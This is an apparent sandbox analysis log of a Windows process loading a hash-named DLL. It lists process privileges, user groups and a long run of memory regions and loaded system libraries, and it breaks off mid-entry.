"c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x56646000" os_pid = "0x1254" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode_tile_data" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3227 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3228 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3229 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3230 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 3231 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3232 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3233 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3234 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3235 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 3236 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 3237 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3240 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3241 start_va = 0x450000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 3242 start_va = 0x550000 end_va = 0x60dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3243 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 3244 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3245 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3246 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3247 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3248 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3249 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3250 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3254 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3255 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3256 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3257 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3258 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3259 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3260 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3261 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3262 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3263 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3264 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3265 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3266 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3267 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3315 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3316 start_va = 0x710000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 3317 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3318 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 3319 start_va = 0xa30000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 3377 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3378 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3379 start_va = 0x1e30000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3380 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3381 start_va = 0x1ef0000 end_va = 0x1faffff monitored = 0 entry_point = 0x1f10da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3434 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 3481 start_va = 0x1ef0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 3526 start_va = 0x1ff0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 3527 start_va = 0x21f0000 end_va = 0x25effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 3534 start_va = 0x25f0000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 3537 start_va = 0x2df0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 3813 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 3816 start_va = 0x3dc0000 end_va = 0x40f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3863 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3865 start_va = 0x4100000 end_va = 0x4387fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 3879 start_va = 0x4100000 end_va = 0x4244fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 3881 start_va = 0x4100000 end_va = 0x42c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 4141 start_va = 0x4100000 end_va = 0x5695fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 4209 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4212 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4213 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4214 start_va = 0x4100000 end_va = 0x42c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 4215 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4216 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4217 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4219 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4223 start_va = 0x4100000 end_va = 0x4264fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 4225 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 4226 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4227 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4228 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4229 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4230 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4231 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4232 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4233 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4234 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4235 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4236 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4237 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4238 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4239 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4240 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4241 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4242 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4243 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4244 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4245 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4246 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4247 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4248 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4249 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4250 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4251 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4252 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4253 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4254 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4255 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4256 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4257 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4258 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4259 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4260 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4261 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4262 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4263 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4264 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4265 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4266 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4267 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4268 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4269 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4270 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4271 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4272 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4273 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4274 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4275 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4276 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4277 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4278 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4279 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4280 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4281 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4282 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4283 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4284 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4285 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4286 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4287 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4288 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4289 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4294 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4295 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4296 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4297 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4298 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4299 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4300 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4301 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4302 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4303 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4304 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4305 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4306 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4307 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4308 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4309 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4310 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4311 start_va = 0x1b0000 end_va = 